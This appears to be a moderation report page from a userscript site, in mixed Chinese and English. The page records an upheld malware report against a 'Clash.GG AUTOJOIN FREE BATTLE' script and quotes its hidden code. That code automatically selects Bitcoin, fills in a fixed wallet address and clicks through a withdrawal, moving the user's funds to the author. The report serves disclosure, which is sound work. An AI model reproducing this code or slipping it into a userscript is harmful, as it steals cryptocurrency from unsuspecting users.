Clash.GG AUTOJOIN FREE BATTLE Script - + Text to Link在2024-12-17 被檢舉,因為:惡意軟體
Hidden code to send CRYPTO to an address
// Perform
function performSequence() {
// Click on option
setTimeout(() => clickElementByText('span', 'Bitcoin'), 300);
// 1
setTimeout(() => inputText('.css-1ljxsvl.e8bzvmc0', '3NrDGFzNxKGH4jKxrfQTDXBTKyhJy11yoL'), 600);
// checkbox
setTimeout(() => clickElement('.css-1jrx41j.e8bzvmc0'), 800);
// Click
setTimeout(() => {
const elements = document.querySelectorAll('.css-qifdi4');
if (elements.length > 1) {
elements[1].click();
}
}, 1000);
// Click on the final button
setTimeout(() => clickElement('.css-1c5xwju'), 1200);
}
This script has had 1 previous upheld or fixed report.
Fix Hack已封鎖 (the reported user) has made:
管理員已通過該檢舉。